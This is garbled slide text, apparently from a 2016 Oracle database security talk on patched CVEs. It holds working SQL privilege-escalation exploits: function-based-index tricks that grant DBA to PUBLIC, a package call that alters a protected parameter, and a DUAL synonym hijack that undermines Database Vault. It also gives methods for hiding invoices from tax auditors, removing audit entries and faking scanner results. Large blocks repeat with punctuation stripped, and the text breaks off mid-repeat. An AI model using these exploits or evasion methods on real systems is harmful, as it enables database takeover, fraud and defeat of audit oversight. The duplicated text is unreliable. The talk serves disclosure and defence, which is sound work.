Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
